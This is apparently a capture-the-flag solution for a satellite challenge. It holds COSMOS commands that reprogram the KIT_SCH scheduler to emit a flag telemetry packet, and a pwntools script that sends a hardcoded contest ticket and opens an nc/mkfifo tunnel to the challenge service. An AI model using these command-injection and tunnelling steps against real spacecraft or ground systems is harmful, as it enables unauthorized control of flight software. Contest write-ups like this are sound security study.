That's not on my calendar

commands

# Disable Slot 1
cmd("KIT_SCH CFG_SCH_ENTRY with CCSDS_STREAMID 6293, CCSDS_SEQUENCE 49152, CCSDS_LENGTH 6, CCSDS_FUNCCODE 4, CCSDS_CHECKSUM 0, SLOT 1, ACTIVITY 0, CONFIG 0")

# Reprogram Slot 0, Activity 0 to call KIT_TO_TLM_FLAG_MID.
cmd("KIT_SCH LOAD_SCH_ENTRY with CCSDS_STREAMID 6293, CCSDS_SEQUENCE 49152, CCSDS_LENGTH 13, CCSDS_FUNCCODE 5, CCSDS_CHECKSUM 0, SLOT 0, ACTIVITY 0, CONFIG 1, FREQ 1, OFFSET 0, MSG_TBL_IDX 42")

# Reprogram Slot 1, Activity 0 to call KIT_TO_TLM_FLAG_MID.
cmd("KIT_SCH LOAD_SCH_ENTRY with CCSDS_STREAMID 6293, CCSDS_SEQUENCE 49152, CCSDS_LENGTH 13, CCSDS_FUNCCODE 5, CCSDS_CHECKSUM 0, SLOT 0, ACTIVITY 0, CONFIG 1, FREQ 1, OFFSET 0, MSG_TBL_IDX 42")

# Enable Telemetry
cmd("KIT_TO ENABLE_TELEMETRY with CCSDS_STREAMID 6272, CCSDS_SEQUENCE 49152, CCSDS_LENGTH 17, CCSDS_FUNCCODE 7, CCSDS_CHECKSUM 0, IP_ADDR '127.0.0.1'")

# Reset Counters on SCH.
cmd("KIT_SCH RESET_CTRS with CCSDS_STREAMID 6293, CCSDS_SEQUENCE 49152, CCSDS_LENGTH 1, CCSDS_FUNCCODE 1, CCSDS_CHECKSUM 0")

tunnel.py

import sys
import binascii

from pwn import *

TICKET = "ticket{whiskey91484kilo:GLbq8J4O7lHW0Cc9DxjzMDiwym7-atHNlMLVrqE8IFwORWHbV5ZM_O6DTbdzvsfOdw}"

r = remote("calendar.satellitesabove.me", 5061)
r.recvline()  # ticket pls
r.sendline(TICKET)

# Get the forwarding address.
r.recvuntil('tcp:')

# This is super unsafe :D
forwarder = str(r.recvline(), 'utf-8')
hostname = forwarder.split(':')[0].strip()
port = forwarder.split(':')[1].strip()

log.info("Starting tunnel on 8888 to {0} {1}".format(hostname, port))
subprocess.Popen(["mkfifo", "tunnel"])
subprocess.Popen(
    [
        "sh", "-c", "nc -l -k -p 8888 <tunnel | nc {0} {1} >tunnel".format(
            hostname, port
        )
    ]
)

# Loop and print logs.
try:
    while True:
        print(str(r.recvline(), 'utf-8'))
except:
    log.error("Socket died :(")

Flag was in Telemetry, which could be accessed via Cosmos' Packet Viewer. Namely the FLAG_TLM_PKT on KIT_TO.